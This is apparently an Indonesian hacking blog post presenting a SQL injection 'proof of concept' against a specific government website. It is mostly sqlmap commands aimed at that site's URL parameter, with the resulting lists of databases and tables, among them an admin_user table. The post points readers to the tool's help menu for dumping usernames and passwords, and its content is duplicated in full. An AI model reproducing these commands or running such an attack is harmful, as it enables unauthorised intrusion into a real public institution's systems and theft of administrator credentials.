Poc Target Gov Site :
Vuln : php
Dork : imajinasi sendiri
Tools : Sqlmap
Mencari database :
>sqlmap.py -u www.nass.gov.ng/mnass/about.php?id=13 --dbs
[*] information_schema
[*] nass_nassdb
[*] nasscommdb
[*] nasshousedb
[*] nassmgtdb
Menampilkan isi tabel
>sqlmap.py -u www.nass.gov.ng/mnass/about.php?id=13 -D nass_nassdb --tables
[28 tables]
+-----------------------+
| activity |
| admin_user |
| billsprogression |
| committee |
| commview |
| contact_feedback |
| hansard |
| history |
| history_log |
| home |
| jurisdiction |
| news |
| noticepaper |
| officers |
| officers_committee |
| officers_committeeOLD |
| officers_committeex |
| orderpaper |
| p_about |
| p_activity |
| p_contact_feedback |
| p_contactadd |
| p_home |
| p_news |
| p_project |
| petitions |
| sitting |
| votesofproceedings |
+-----------------------+
Menambilkan isi tabel
>sqlmap.py -u www.nass.gov.ng/mnass/about.php?id=13 -D nass_nassdb --tables
[15 tables]
+------------------------------+
| activity |
| advert |
| announcement |
| contact_feedback |
| departments |
| gallery |
| news |
| parp_about |
| parp_about_menu |
| parp_front |
| parp_front_pic |
| parp_publications |
| parp_publications_categories |
| parp_publications_section |
| perp_user |
+------------------------------+
untuk mencari columns gunakan cara
>sqlmap.py -u www.nass.gov.ng/mnass/about.php?id=13 -D nama_databenya -T nama_tabelnya --columns
untuk dump username dan password silahkan dibaca di menu helpnya jangan manja ^_^
Nitip nama saja ;)
Good Luck.
Thanks To : black coding
Vuln : php
Dork : imajinasi sendiri
Tools : Sqlmap
Mencari database :
>sqlmap.py -u www.nass.gov.ng/mnass/about.php?id=13 --dbs
[*] information_schema
[*] nass_nassdb
[*] nasscommdb
[*] nasshousedb
[*] nassmgtdb
Menampilkan isi tabel
>sqlmap.py -u www.nass.gov.ng/mnass/about.php?id=13 -D nass_nassdb --tables
[28 tables]
+-----------------------+
| activity |
| admin_user |
| billsprogression |
| committee |
| commview |
| contact_feedback |
| hansard |
| history |
| history_log |
| home |
| jurisdiction |
| news |
| noticepaper |
| officers |
| officers_committee |
| officers_committeeOLD |
| officers_committeex |
| orderpaper |
| p_about |
| p_activity |
| p_contact_feedback |
| p_contactadd |
| p_home |
| p_news |
| p_project |
| petitions |
| sitting |
| votesofproceedings |
+-----------------------+
Menambilkan isi tabel
>sqlmap.py -u www.nass.gov.ng/mnass/about.php?id=13 -D nass_nassdb --tables
[15 tables]
+------------------------------+
| activity |
| advert |
| announcement |
| contact_feedback |
| departments |
| gallery |
| news |
| parp_about |
| parp_about_menu |
| parp_front |
| parp_front_pic |
| parp_publications |
| parp_publications_categories |
| parp_publications_section |
| perp_user |
+------------------------------+
untuk mencari columns gunakan cara
>sqlmap.py -u www.nass.gov.ng/mnass/about.php?id=13 -D nama_databenya -T nama_tabelnya --columns
untuk dump username dan password silahkan dibaca di menu helpnya jangan manja ^_^
Nitip nama saja ;)
Good Luck.
Thanks To : black coding
0 komentar:
Posting Komentar